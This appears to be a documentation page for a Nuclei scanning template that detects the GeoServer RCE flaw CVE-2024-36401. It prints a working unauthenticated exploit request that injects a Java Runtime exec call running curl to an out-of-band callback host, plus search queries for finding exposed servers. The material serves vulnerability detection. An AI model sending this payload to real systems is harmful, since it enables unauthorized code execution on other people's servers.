Skip to content
Nuclei Templates

GeoServer RCE in Evaluating Property Name Expressions

ID: CVE-2024-36401

Severity: critical

Author: DhiyaneshDk,ryanborum

Tags: cve,cve2024,geoserver,rce,unauth,kev

Description

Section titled “Description”

In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.

YAML Source

Section titled “YAML Source”
id: CVE-2024-36401


info:
  name: GeoServer RCE in Evaluating Property Name Expressions
  author: DhiyaneshDk,ryanborum
  severity: critical
  description: |
    In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
  impact: |
    This vulnerability can lead to executing arbitrary code.
  reference:
    - https://x.com/sirifu4k1/status/1808270303275241607
    - https://nvd.nist.gov/vuln/detail/CVE-2024-36401
    - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
    - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv
  metadata:
    verified: true
    max-request: 1
    vendor: osgeo
    product: geoserver
    shodan-query: "Server: GeoHttpServer"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
    google-query: intitle:"geoserver"
  tags: cve,cve2024,geoserver,rce,unauth,kev


flow: |
   if(http(1))
   {
   set("name",template.typename[0])
   http(2)
   }


http:
  - raw:
      - |
        GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1
        Host: {{Hostname}}


    host-redirects: true
    extractors:
      - type: regex
        name: typename
        part: body
        group: 1
        regex:
          - typeName=([^&\]]+)
        internal: true


  - raw:
      - |
        @timeout 20s
        GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"


      - type: word
        part: content_type
        words:
          - "application/xml"
# digest: 4a0a00473045022100cb6c0cb42d1e00af308b4aad26132048427911f01c602976e63e570a9c54d5cb02200dde74e6aa864012ddd86c5cf0f905749e3371a9efca16994ae0f98ab2e52ff2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-36401.yaml"

View on Github